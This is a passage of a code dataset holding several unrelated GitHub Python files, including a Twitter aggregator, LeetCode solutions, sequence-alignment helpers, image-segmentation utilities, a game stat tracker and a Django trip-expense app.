from the tweet (if there is one like a news page)\n linkText = tweetText.split(\" \")[-1]\n #checking is there is a link, if so, html tag will be added to make the link clickable \n \n if linkText[0:4] == \"http\":\n data += f\"@{scrnName}
{tweetText}
{tweetTime}
Link

\"\n #If no link, then the tag wont be added.\n else:\n data += f\"@{scrnName}
{tweetText}
{tweetTime}

\" \n else:\n pass\n return data\n\n#Gets the latest tweets from the \"scName\" specified. \ndef tWhite(api):\n scName = [\"realDonaldTrump\", \"MarketWatch\", \"DeItaOne\"]\n for x in scName:\n tweets = api.user_timeline(screen_name = x)\n print(tweets[0].user.screen_name)\n print(tweets[0].text)\n print(parseTime(tweets[0].created_at))\n print(\"_\" *100)\n\n#Twitter main function, has all the secrets and keys to authenticate.\ndef twitter(pWhitelistChoice ,searchQuery): \n try:\n #Enter your twitter auth codes here.\n consumerKey = \"\"\n consumerSecret = \"\"\n accessToken = \"\"\n accessSecret = \"\"\n\n auth = tweepy.OAuthHandler(consumerKey, consumerSecret)\n auth.set_access_token(accessToken, accessSecret)\n api = tweepy.API(auth, wait_on_rate_limit=True)\n\n if pWhitelistChoice == \"Whitelist\":\n data = getWhitelistedTweets(api, searchQuery)\n return data\n else:\n data = getNonWhitelistedTweets(api, searchQuery)\n return data\n except Exception as e:\n print(\"Authentication Failed... No Twitter results will be shown.\")\n print(e)\n return \"oof\"","repo_name":"PushKaf/google-twitter-content-aggregator","sub_path":"Search.py","file_name":"Search.py","file_ext":"py","file_size_in_byte":5607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18984112183","text":"import sys\n\nfrom phising.exception import PhisingException\nfrom phising.pipeline.training_pipeline import TrainPipeline\nfrom phising.utils.main_utils import sync_app_artifacts\n\n\ndef start_training():\n try:\n tp = TrainPipeline()\n\n tp.run_pipeline()\n\n except Exception as e:\n raise PhisingException(e, sys)\n\n finally:\n sync_app_artifacts()\n\n\nif __name__ == \"__main__\":\n start_training()\n","repo_name":"sethusaim/phising-classifaction","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"15475284140","text":"class Solution:\n def wateringPlants(self, plants: List[int], capacity: int) -> int:\n temp = capacity\n ans = 0\n for i in range(len(plants)):\n temp -= plants[i]\n if temp >= 0:\n ans += 1\n else:\n temp = capacity - plants[i]\n ans += (2 *i)+ 1\n return ans","repo_name":"Tolosa-mitiku/leet-code","sub_path":"2079-watering-plants/2079-watering-plants.py","file_name":"2079-watering-plants.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39109968532","text":"# calling of functions\n# 2 ways for calling a function\n# call by value (pass by value)\n# call by reference (pass by reference)\n\n# call by value\ndef myfun(x):\n x=13\n print(x, id(x))\n\nx=15\nmyfun(x)\nprint(x, id(x))\n\ndef myfun1(x):\n x=13\n print(x, id(x))\n\ny=15\nmyfun1(y)\nprint(y, id(y))\n\n# local varible\n# this varible says that if a varible is used inside a function then the life time limits upto that function exists.\n# after the job of functions gets over then the scope of variable also over.\n# the preference of local varible inside a function is always top most.","repo_name":"kumarsandeep2166/arpita-python-class","sub_path":"functions/demo6.py","file_name":"demo6.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3057149315","text":"from typing import Tuple\n\"\"\"A module for translating between alignments and edits sequences.\"\"\"\n\n\ndef get_edits(p: str, q: str) -> Tuple[str, str, str]:\n \"\"\"Extract the edit operations from a pairwise alignment.\n\n Args:\n p (str): The first row in the pairwise alignment.\n q (str): The second row in the pairwise alignment.\n\n Returns:\n str: The list of edit operations as a string.\n\n >>> get_edits('ACCACAGT-CATA', 'A-CAGAGTACAAA')\n ('ACCACAGTCATA', 'ACAGAGTACAAA', 'MDMMMMMMIMMMM')\n\n \"\"\"\n assert len(p) == len(q)\n\n out_p = ''\n out_q = ''\n edits = ''\n\n for i in range(len(p)):\n cp = p[i]\n cq = q[i]\n if cp != '-' and cq != '-':\n out_p += cp\n out_q += cq\n edits += 'M'\n if cp == '-':\n out_q += cq\n edits += 'I'\n if cq == '-':\n out_p += cp\n edits += 'D'\n\n\n return out_p, out_q, edits\n\n\ndef local_align(p: str, x: str, i: int, edits: str) -> Tuple[str, str]:\n \"\"\"Align two sequences from a sequence of edits.\n\n Args:\n p (str): The read string we have mapped against x\n x (str): The longer string we have mapped against\n i (int): The location where we have an approximative match\n edits (str): The list of edits to apply, given as a string\n\n Returns:\n tuple[str, str]: The two rows in the pairwise alignment\n\n >>> local_align(\"ACCACAGTCATA\", \"GTACAGAGTACAAA\", 2, \"MDMMMMMMIMMMM\")\n ('ACCACAGT-CATA', 'A-CAGAGTACAAA')\n\n \"\"\"\n return align(p, x[i:], edits)\n\n\ndef align(p: str, q: str, edits: str) -> Tuple[str, str]:\n \"\"\"Align two sequences from a sequence of edits.\n\n Args:\n p (str): The first sequence to align.\n q (str): The second sequence to align\n edits (str): The list of edits to apply, given as a string\n\n Returns:\n tuple[str, str]: The two rows in the pairwise alignment\n\n >>> align(\"ACCACAGTCATA\", \"ACAGAGTACAAA\", \"MDMMMMMMIMMMM\")\n ('ACCACAGT-CATA', 'A-CAGAGTACAAA')\n\n \"\"\"\n out_p = ''\n out_q = ''\n i_p = 0\n i_q = 0\n\n for e in edits:\n if (e == 'M'):\n out_p += p[i_p]\n out_q += q[i_q]\n i_p += 1\n i_q += 1\n if (e == 'I'):\n out_p += '-'\n out_q += q[i_q]\n i_q += 1\n if (e == 'D'):\n out_p += p[i_p]\n out_q += '-'\n i_p += 1\n \n\n return out_p, out_q\n\n\ndef edit_dist(p: str, x: str, i: int, edits: str) -> int:\n \"\"\"Get the distance between p and the string that starts at x[i:]\n using the edits.\n\n Args:\n p (str): The read string we have mapped against x\n x (str): The longer string we have mapped against\n i (int): The location where we have an approximative match\n edits (str): The list of edits to apply, given as a string\n\n Returns:\n int: The distance from p to x[i:?] described by edits\n\n >>> edit_dist(\"accaaagta\", \"cgacaaatgtcca\", 2, \"MDMMIMMMMIIM\")\n 5\n \"\"\"\n aligned_p, aligned_q = local_align(p, x, i, edits)\n dist = 0\n \n for i in range (len(aligned_p)):\n c_p = aligned_p[i]\n c_q = aligned_q[i]\n if c_p == '-' or c_q == '-':\n dist += 1\n elif c_p != c_q:\n dist += 1\n \n\n return dist","repo_name":"birc-gsa-2022/cigar-python-annesparks","sub_path":"src/align.py","file_name":"align.py","file_ext":"py","file_size_in_byte":3331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20846955964","text":"from torchvision import transforms\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom numba import njit\nfrom tqdm import tqdm\nfrom PIL import Image\nimport urllib.request\nimport numpy as np\nimport warnings\nimport torch\nimport math\nimport cv2\n\ncmap = 'tab20'\ndef save_or_show(arr, filename, dir, save=False):\n if save:\n plt.imsave(dir + filename + '_org' + '.png', arr[0], cmap=cmap)\n plt.imsave(dir + filename + '_mask' + '.png', arr[1], cmap=cmap)\n plt.imsave(dir + filename + '_fused' + '.png', arr[2], cmap=cmap)\n else:\n im_show_n(arr, 3, 'org, mask, fused')\n\n\ndef graph_to_mask(S, cc, stride, image_tensor, image):\n # Reshape clustered graph\n minus = 1 if stride == 4 else 0\n # -1 is needed only for stride==4 of descriptor extraction\n S = np.array(torch.reshape(S, (\n int(image_tensor.shape[2] // stride) - minus, int(image_tensor.shape[3] // stride) - minus)))\n\n # check if background is 0 and main object is 1 in segmentation map\n if (S[0][0] + S[S.shape[0] - 1][0] + S[0][S.shape[1] - 1] + S[S.shape[0] - 1][S.shape[1] - 1]) > 2:\n S = 1 - S\n\n # chose largest component (for k == 2)\n if cc:\n S = largest_cc(S)\n\n # mask to original image size\n mask = cv2.resize(S.astype('float'), (image[:, :, 0].shape[1], image[:, :, 0].shape[0]),\n interpolation=cv2.INTER_NEAREST)\n\n S = torch.tensor(np.reshape(S, (S.shape[0] * S.shape[0],))).type(torch.LongTensor)\n\n return mask, S\n\ndef create_adj(F, cut, alpha=1):\n W = F @ F.T\n # if NCut\n if cut == 0: \n # threshold\n W = W * (W > 0)\n # norm\n W = W / W.max()\n # if CC\n else:\n W = W - (W.max() / alpha)\n \n return W\n\ndef im_show_n(im_arr, n, title):\n \"\"\"\n Display images N in a row from arbitrary number of images in a list\n :param im_arr: array of images\n :param n: Number of subplots in a row\n :param title: Window name\n @author:Amit\n \"\"\"\n fig, axes = plt.subplots(len(im_arr) // n if len(im_arr) % n == 0 else len(im_arr) // n + 1, n, squeeze=False,\n dpi=200)\n\n count = 0\n for i in range(len(im_arr)):\n axes[count // n][count % n].imshow(im_arr[i])\n axes[count // n][count % n].axis('off')\n count = count + 1\n # Delete axis for non-full rows\n for i in range(len(im_arr) + 1, n):\n axes[count // n][count % n].axis('off')\n count = count + 1\n\n fig.canvas.manager.set_window_title(title)\n fig.suptitle(title)\n plt.show()\n # plt.savefig('./try.png')\n\n\n@njit()\ndef discr_ncut(A, B, deg, W):\n \"\"\"\n Calculate discrete normalized-cut of a given graph for k=2 cut.\n @param A: First cluster of nodes\n @param B: Second cluster of nodes\n @param deg: Array of node degrees\n @param W: Adjacency matrix\n @return: Normalized-cut value\n \"\"\"\n # sum of cut edges\n cut_size = 0\n for i in range(A[0].shape[0]):\n for j in range(B[0].shape[0]):\n cut_size = cut_size + W[A[0][i]][B[0][j]]\n # sum of out degrees\n ncut = 1. / np.sum(deg[A[0]]) + 1. / np.sum(deg[B[0]])\n ncut = cut_size * ncut\n\n return ncut\n\n# suggested use of discr_ncut\n\"\"\"\nfrom torch_geometric.utils import degree\n\nsum of cut edges\ndeg = degree(edge_index[0])\nA = np.where(S == 0)\nB = np.where(S == 1)\nncut = discr_ncut(A, B, np.array(deg), W)\n\"\"\"\n\n\ndef load_data(adj, node_feats):\n \"\"\"\n Load data to pytorch-geometric data format\n @param adj: Adjacency metrix of a graph\n @param node_feats: Feature matrix of a graph\n @return: Graph in pytorch-geometric data format\n \"\"\"\n node_feats = torch.from_numpy(node_feats)\n edge_index = torch.from_numpy(np.array(np.nonzero((adj > 0))))\n row, col = edge_index\n edge_weight = torch.from_numpy(adj[row, col])\n\n return node_feats, edge_index, edge_weight\n\n\ndef load_data_img(chosen_dir, image_size):\n \"\"\"\n Load image to model (Resize, To tensor, normalize)\n @param chosen_dir: Directory for loaded image\n @param image_size: Output size for image\n @return: Resized image as a tensor and original image as a tuple\n \"\"\"\n # Load image\n pil_image = Image.open(chosen_dir).convert('RGB')\n\n # Define transformations\n prep = transforms.Compose([\n transforms.Resize(image_size, interpolation=transforms.InterpolationMode.LANCZOS),\n transforms.ToTensor(),\n transforms.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225))\n ])\n\n # Resized image tensor\n image_tensor = prep(pil_image)[None, ...]\n\n # To numpy array\n image = np.array(pil_image)\n\n return image_tensor, image\n\n\ndef largest_cc(S):\n \"\"\"\n Gets a segmentation map and finds the largest connected component, discards the rest of the segmentation map.\n @param S: Segmentation map\n @return: Largest connected component in given segmentation map\n \"\"\"\n us_cc = cv2.connectedComponentsWithStats(S.astype('uint8'), connectivity=4)\n # get indexes of sorted sizes for CCs\n us_cc_stat = us_cc[2]\n cc_idc = np.argsort(us_cc_stat[:, -1])[::-1]\n # decision rule for crop\n if np.percentile(S[us_cc[1] == cc_idc[0]], 99) == 0:\n # 99th percentile of biggest connected component is 0 -> cc_idc[0] is background\n mask: np.ndarray = np.equal(us_cc[1], cc_idc[1])\n elif np.percentile(S[us_cc[1] == cc_idc[1]], 99) == 0:\n # 99th percentile of 2nd biggest connected component is 0 -> cc_idc[0] is background\n mask: np.ndarray = np.equal(us_cc[1], cc_idc[0])\n else:\n raise NotImplementedError('No valid decision rule for cropping')\n\n return mask\n\n\ndef apply_seg_map(img, seg, alpha):\n \"\"\"\n Overlay segmentation map onto an image, the function is jited for performance.\n @param img: input image as numpy array\n @param seg: input segmentation map as a numpy array\n @param alpha: The opacity of the segmentation overlay, 0==transparent, 1==only segmentation map\n @return: segmented image as a numpy array\n \"\"\"\n plt.imsave('./tmp/tmp.png', seg, cmap=cmap)\n seg = (plt.imread('./tmp/tmp.png')[:,:,:3] * 255).astype(np.uint8)\n return ((seg * alpha) + (img * (1 - alpha))).astype(np.uint8)\n\ndef _no_grad_trunc_normal_(tensor, mean, std, a, b):\n # Cut & paste from PyTorch official master until it's in a few official releases - RW\n # Method based on https://people.sc.fsu.edu/~jburkardt/presentations/truncated_normal.pdf\n def norm_cdf(x):\n # Computes standard normal cumulative distribution function\n return (1. + math.erf(x / math.sqrt(2.))) / 2.\n\n if (mean < a - 2 * std) or (mean > b + 2 * std):\n warnings.warn(\"mean is more than 2 std from [a, b] in nn.init.trunc_normal_. \"\n \"The distribution of values may be incorrect.\",\n stacklevel=2)\n\n with torch.no_grad():\n # Values are generated by using a truncated uniform distribution and\n # then using the inverse CDF for the normal distribution.\n # Get upper and lower cdf values\n l = norm_cdf((a - mean) / std)\n u = norm_cdf((b - mean) / std)\n\n # Uniformly fill tensor with values from [l, u], then translate to\n # [2l-1, 2u-1].\n tensor.uniform_(2 * l - 1, 2 * u - 1)\n\n # Use inverse cdf transform for normal distribution to get truncated\n # standard normal\n tensor.erfinv_()\n\n # Transform to proper mean, std\n tensor.mul_(std * math.sqrt(2.))\n tensor.add_(mean)\n\n # Clamp to ensure it's in the proper range\n tensor.clamp_(min=a, max=b)\n return tensor\n\n\ndef trunc_normal_(tensor, mean=0., std=1., a=-2., b=2.):\n return _no_grad_trunc_normal_(tensor, mean, std, a, b)\n\n\nclass DownloadProgressBar(tqdm):\n def update_to(self, b=1, bsize=1, tsize=None):\n if tsize is not None:\n self.total = tsize\n self.update(b * bsize - self.n)\n\n\ndef download_url(url, output_path):\n with DownloadProgressBar(unit='B', unit_scale=True,\n miniters=1, desc=url.split('/')[-1]) as t:\n urllib.request.urlretrieve(url, filename=output_path, reporthook=t.update_to)\n","repo_name":"SAMPL-Weizmann/DeepCut","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":8175,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"77"} +{"seq_id":"1846498674","text":"class Solution(object):\n def sub_merge(self, interval_1, interval_2):\n # 对两个有序区间的合并\n l1, r1 = interval_1[0], interval_1[1]\n l2, r2 = interval_2[0], interval_2[1]\n if r1=l2 and r1=l2 and r1>=r2:\n # interval_1包含intervals_2\n return [[l1, r1]]\n\n def merge(self, intervals):\n \"\"\"\n :type intervals: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n if len(intervals) == 0:\n return intervals\n # 先按左区间升序排序\n for i in range(len(intervals)-1):\n for j in range(i+1, len(intervals)):\n if intervals[i][0] > intervals[j][0]:\n temp = intervals[i]\n intervals[i] = intervals[j]\n intervals[j] = temp\n \n ret = [intervals[0]]\n for i in range(1, len(intervals)):\n sub_ret = self.sub_merge(ret[-1], intervals[i])\n ret.pop()\n ret.extend(sub_ret)\n \n return ret\n\ntest_sample = [[1, 4], [0, 1]]\nsl = Solution()\nprint(sl.merge(test_sample))","repo_name":"zhengsizuo/leetcode-zhs","sub_path":"排序/56-合并区间.py","file_name":"56-合并区间.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30515012388","text":"from riotwatcher import LolWatcher, ApiError\nimport json\nimport os\n\n# set working directory\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\n\n# importing the config file\nwith open(\"config.json\") as config_file:\n config_info = json.load(config_file)\n\n # loading config info\n lol_watcher = LolWatcher(config_info[\"APIKEY\"])\n my_region = config_info[\"REGION\"]\n sum_name = config_info[\"SUM_NAME\"]\n num_games = config_info[\"NUM_GAMES\"]\n champ_id = config_info[\"CHAMPIONID\"] # can be found in data dragon json file\n\n# pulling profile and ranked info from api\nme = lol_watcher.summoner.by_name(my_region, sum_name)\nmy_ranked_stats = lol_watcher.league.by_summoner(my_region, me['id'])\n\n# checking for api errors\ntry:\n response = lol_watcher.summoner.by_name(my_region, sum_name)\nexcept ApiError as err:\n if err.response.status_code == 429:\n print('We should retry in {} seconds.'.format(\n err.headers['Retry-After']))\n print('this retry-after is handled by default by the RiotWatcher library')\n print('future requests wait until the retry-after time passes')\n elif err.response.status_code == 404:\n print('Summoner name not found, check the config file.')\n else:\n raise\n\n# getting total wins and total games played\nwins = my_ranked_stats[0][\"wins\"]\ntotal_games_played = wins + my_ranked_stats[0][\"losses\"]\n\n# getting mastery points from api\nmastery_points = lol_watcher.champion_mastery.by_summoner_by_champion(my_region, me[\"id\"], champ_id)[\"championPoints\"]\n\n# opening the match data file\nwith open(\"match_data.json\") as match_json_file:\n # save the data if the file has any\n if os.path.getsize(\"match_data.json\") != 0:\n match_json_data = json.load(match_json_file)\n else:\n # create a dictionary to save the data\n match_json_data = {}\n\n# reading the match data\nmatchlist = lol_watcher.match.matchlist_by_puuid(\"NA1\", me[\"puuid\"], 0, num_games, type=\"ranked\")\n\n# checking if the match is already in the list\nfor index, matches in enumerate(matchlist):\n existing = False\n for existing_matches in match_json_data:\n if matches == existing_matches:\n existing = True\n\n # saving the data for each match\n if existing == False:\n match_json_data[matches] = {}\n\n kills = 0\n assists = 0\n blue_side_kills = 0\n red_side_kills = 0\n total_kills = 0\n my_team = 0\n deaths = 0\n cs = 0\n gametime = 0\n win = False\n\n # save the match length\n match_json_data[matches][\"gametime\"] = selected_match[\"gameDuration\"]\n\n # read the players in the selected match\n selected_match = lol_watcher.match.by_id(my_region, matches)[\"info\"]\n participants = selected_match[\"participants\"]\n\n # iterate through each player in the match\n for people in participants:\n # finding total team kills per side\n if people[\"teamId\"] == 100:\n blue_side_kills += people[\"kills\"]\n if people[\"teamId\"] == 200:\n red_side_kills += people[\"kills\"]\n \n # checking for desired summoner\n if people[\"summonerName\"] == sum_name:\n # saving their data for that match\n my_team = people[\"teamId\"]\n kills += people[\"kills\"]\n assists += people[\"assists\"]\n deaths += people[\"deaths\"]\n cs += people[\"totalMinionsKilled\"] + \\\n people[\"neutralMinionsKilled\"]\n if people[\"win\"] == True:\n match_json_data[matches][\"win\"] = True\n else:\n match_json_data[matches][\"win\"] = False\n\n # finding total team kills for the desired summoner's team\n if my_team == 100:\n total_kills += blue_side_kills\n if my_team == 200:\n total_kills += red_side_kills\n\n # writing the desired summoner's match data\n match_json_data[matches][\"kills\"] = kills\n match_json_data[matches][\"deaths\"] = deaths\n match_json_data[matches][\"assists\"] = assists\n match_json_data[matches][\"cs\"] = cs\n match_json_data[matches][\"total_kills\"] = total_kills\n else: break\n\n# write the match info to the file\nwith open(\"match_data.json\", \"w\") as match_json_file:\n match_json_file.write(json.dumps(match_json_data, indent=2))\n\nkp = 0\nkda = 0\nwr20g = 0\ncspm = 0\nwin20g = 0\nloss20g = 0\nsum_kills = 0\nsum_assists = 0\nsum_total_kills = 0\nsum_deaths = 0\nsum_cs = 0\nsum_gametime = 0\n\n# loop through each match in the finalized data\nfor index, matches in enumerate(match_json_data):\n # check first 20 games for winrate\n if index < 20:\n # finding 20 game winrate\n if match_json_data[matches][\"win\"] == True:\n win20g += 1\n if match_json_data[matches][\"win\"] == False:\n loss20g += 1\n # sum of desired summoner's stats\n sum_gametime += match_json_data[matches][\"gametime\"]\n sum_kills += match_json_data[matches][\"kills\"]\n sum_deaths += match_json_data[matches][\"deaths\"]\n sum_assists += match_json_data[matches][\"assists\"]\n sum_cs += match_json_data[matches][\"cs\"]\n sum_total_kills += match_json_data[matches][\"total_kills\"]\n\n# calculations for desired summoner's stats\nkp = round(100*(sum_kills + sum_assists)/sum_total_kills)\nkda = round((sum_kills + sum_assists)/sum_deaths, 2)\nwr20g = round(100*win20g/(loss20g+win20g))\ncspm = round(sum_cs/(sum_gametime/60), 2)\n\n# writing final data to files to be read by obs\nwith open(\"top_left.txt\", \"w\") as top_left, open(\"top_right.txt\", \"w\") as top_right:\n top_left.write(\"Overall WR: {}%\\n\".format(round(wins / total_games_played*100)))\n top_left.write(\"WR (20 Games): {}%\\n\".format(round(wr20g)))\n top_left.write(\"Rank: {} {}\\n\".format(my_ranked_stats[0][\"tier\"], my_ranked_stats[0][\"rank\"]))\n top_left.write(\"LP: {}\".format(my_ranked_stats[0][\"leaguePoints\"]))\n\n top_right.write(\"MASTERY POINTS: {}K\\n\".format(round(mastery_points/1000, 1)))\n top_right.write(\"KDA: {}\\n\".format(kda))\n top_right.write(\"KP: {}%\\n\".format(kp))\n top_right.write(\"CS/MIN: {}\".format(cspm))\n","repo_name":"amckillican/LOLStatTracker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73835468089","text":"\"\"\"\n# Rucksack Reorganization\nAdvent Of Code, Day 3\nhttps://adventofcode.com/2022/day/3\n\n## Rules\n\nSuppose you have the following list of contents from six rucksacks:\n\n -------------------------------- \n vJrwpWtwJgWrhcsFMMfFFhFp\n jqHRNqRjqzjGDLGLrsFMfFZSrLrFZsSL\n PmmdzqPrVvPwwTWBwg\n wMqvLMZHhHMvwLHjbvcjnnSBnvTQFn\n ttgJtRGJQctTZtZT\n CrZsJsPPZsGzwwsLwLmpwMDw\n -------------------------------- \n \n - The first rucksack contains the items vJrwpWtwJgWrhcsFMMfFFhFp, which means its first compartment contains the items vJrwpWtwJgWr, while the second compartment contains the items hcsFMMfFFhFp. The only item type that appears in both compartments is lowercase p.\n - The second rucksack's compartments contain jqHRNqRjqzjGDLGL and rsFMfFZSrLrFZsSL. The only item type that appears in both compartments is uppercase L.\n - The third rucksack's compartments contain PmmdzqPrV and vPwwTWBwg; the only common item type is uppercase P.\n - The fourth rucksack's compartments only share item type v.\n - The fifth rucksack's compartments only share item type t.\n - The sixth rucksack's compartments only share item type s.\n\nTo help prioritize item rearrangement, every item type can be converted to a priority:\n\n - Lowercase item types a through z have priorities 1 through 26.\n - Uppercase item types A through Z have priorities 27 through 52.\n\nIn the above example, the priority of the item type that appears in both compartments of each rucksack is 16 (p), 38 (L), 42 (P), 22 (v), 20 (t), and 19 (s); the sum of these is 157.\n\n\n## Part 1:\nFind the sum of the priorities of the item types that appear in both compartments of each rucksack.\n\n\"\"\"\n\n# Declare sum of priorities\npriorities = 0\n\nwith open(\"input.txt\", \"r\") as file:\n for line in file:\n\n # Helper to break from loops: \n # \"True\" if item that appears in both rucksack's compartments is found\n # \"False\" by default - resets on each rucksack iteration\n found = False\n\n # Amount of items in rucksack\n items = len(line.rstrip())\n\n # Go through the first rucksack's compartment\n for i in range(items // 2):\n\n if found == True:\n break\n \n # Go through the second rucksack's compartment\n for j in range(items // 2, items):\n\n if found == True:\n break\n\n if line[i] == line[j]:\n\n found = True\n\n # Check for letter case and add priorities accordingly\n # 1. Use \"ord\" method to convert character to ASCII decimal\n # 2. Subtract number according to letter case to get proper amount of priorities\n if line[i] == line[i].upper():\n priorities += ord(line[i]) - 38\n\n elif line[i] == line[i].lower():\n priorities += ord(line[i]) - 96\n \n\n# Print sum of priorities\nprint(priorities)","repo_name":"chtozamm/AdventOfCode-2022","sub_path":"Day 3/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29630551101","text":"from os import listdir, system\nfrom os.path import isfile, join, dirname\n\nscriptDir = dirname(__file__)\nextensionsPath = '../packages/extensions'\ndirPath = join(scriptDir, extensionsPath)\nextensionFiles = [f for f in listdir(dirPath) if isfile(join(dirPath, f))]\n\nfor extensionFile in extensionFiles:\n system('code --install-extension {}/{}'.format(dirPath, extensionFile))\n","repo_name":"triggerScript/vscode-pack","sub_path":"src/vscode-install.py","file_name":"vscode-install.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70824884730","text":"import os\nimport re\nfrom json import JSONDecodeError\nfrom typing import Generator, Iterator, List, Optional, Union\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nDATA_DIR = os.path.join(BASE_DIR, \"data\")\n\n\ndef load_data(file_name: str) -> Generator:\n \"\"\"Check file_name in data directory and read the file\"\"\"\n\n try:\n with open(f'{DATA_DIR}/{file_name}', 'r', encoding='utf-8') as file:\n for row in file:\n yield row\n except (FileNotFoundError, JSONDecodeError):\n return 'No such file in directory', 400\n\n\ndef regex(data: Iterator, reg_exp: str) -> Iterator:\n \"\"\"Filter data by regular expression\"\"\"\n\n return filter(lambda line: re.search(f'{reg_exp}', line), data)\n\n\ndef filter_data(data: Iterator, value: Optional[str]) -> Iterator:\n \"\"\"Filter data by value\"\"\"\n\n return filter(lambda l: value in l, data)\n\n\ndef map_data(data: Iterator, value: Union[str, int]) -> Iterator:\n \"\"\"Split data byt space and return the value column\"\"\"\n\n map_value = int(value)\n return map(lambda l: l.split(' ')[map_value], data)\n\n\ndef limit_result(data: Union[Generator, Iterator], limit_value: str) -> List[str]:\n \"\"\"Return limited by limit_value number of lines\"\"\"\n\n int_limit = int(limit_value)\n return list(data)[:int_limit]\n\n\ndef result_data(file_name: str, commands_dict: dict) -> Iterator:\n \"\"\"Receive data and process it depending on the request\n commands and values and return processing result\"\"\"\n\n result: Iterator = load_data(file_name=file_name)\n if 'filter' in commands_dict.keys():\n result = filter_data(result, commands_dict.get('filter'))\n\n if 'map' in commands_dict.keys():\n result = map_data(result, commands_dict.get('map'))\n\n if 'regex' in commands_dict.keys():\n result = regex(result, commands_dict.get('regex'))\n\n if 'sort' in commands_dict.keys():\n if commands_dict['sort'] == 'desc':\n result = sorted(list(result), reverse=True)\n else:\n result = sorted(list(result))\n\n if 'limit' in commands_dict.keys():\n result = limit_result(result, commands_dict.get('limit'))\n elif \"unique\" in commands_dict.keys():\n result = list(set(result))\n return result\n","repo_name":"VaDmitrii/hw24_DV","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74477198329","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('morador', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='veiculo',\n name='ano',\n field=models.IntegerField(),\n ),\n ]\n","repo_name":"ivandiniz/CondoPrime","sub_path":"morador/migrations/0002_auto_20150812_2116.py","file_name":"0002_auto_20150812_2116.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28588603855","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom .models import Trip, Transaction\nimport django.utils.timezone as tz\nimport numpy as np\nimport pandas as pd\n\ndef index(request):\n trips = Trip.objects.all()\n context={\n 'trips' : trips\n }\n return render(request, 'index3.html', context)\n\ndef insert_trip(request):\n return render(request, 'insert.html')\n\ndef insert_trip_value(request):\n if request.method == 'POST':\n trip_name = request.POST['trip_name']\n description = request.POST['description']\n members_data = request.POST['members']\n members = list(members_data.split(','))\n # print(members)\n\n t = Trip(trip_name=trip_name, description=description, date=tz.localtime(), members=members)\n t.save()\n\n trips = Trip.objects.all()\n context={\n 'trips' : trips\n }\n # return render(request, 'index3.html', context)\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n else:\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n # return render(request, 'insert.html')\n\ndef delete_trip(request, trip_id):\n # trip_id = request.POST['delete_value_trip']\n\n Trip.objects.filter(id=trip_id).delete()\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\ndef insert_trans_value(request, trip_id):\n if request.method == 'POST':\n print(trip_id)\n trip = Trip.objects.get(id=trip_id)\n # print(trip)\n amt_from = request.POST['amt_from']\n amount_to_data = request.POST['amount_to']\n amount_to = list(amount_to_data.split(','))\n amount = request.POST['amount']\n trans = Transaction(trip_name=trip, amt_from=amt_from, amount_to=amount_to, amount=amount)\n trans.save()\n # trip = Trip.objects.all()[-1]\n # trans.Trip.add(trip)\n\n # trans = Transaction.objects.filter(trip_name_id=trip_id)\n # context = {\n # \"trans\" : trans\n # }\n # return render(request, 'insert_trans.html',context)\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n else:\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\ndef delete_trans(request, trip_id, trans_id):\n print(trip_id)\n # trans_id = request.POST['delete_value_trans']\n Transaction.objects.filter(id=trans_id).delete()\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\ndef trip_expand(request, trip_id):\n # trip = Trip.objects.get()\n trans = Transaction.objects.filter(trip_name_id=trip_id)\n trip = Trip.objects.filter(id=trip_id)\n context = {\n \"trip_name\":trip,\n \"trans\" : trans\n }\n return render(request, 'insert_trans.html', context)\n\ndef analysis_trans(request, trip_id):\n data = Transaction.objects.filter(trip_name_id=trip_id)\n data2 = Transaction.objects.filter(trip_name_id=trip_id)\n # print(\"Trans\")\n # print(type(trans))\n # print(trans[0])\n # print(trans)\n trip = Trip.objects.get(id=trip_id)\n names = trip.members\n # print(type(xnames))\n # print(xnames)\n matrix = np.zeros([len(names),len(names)])\n # names = 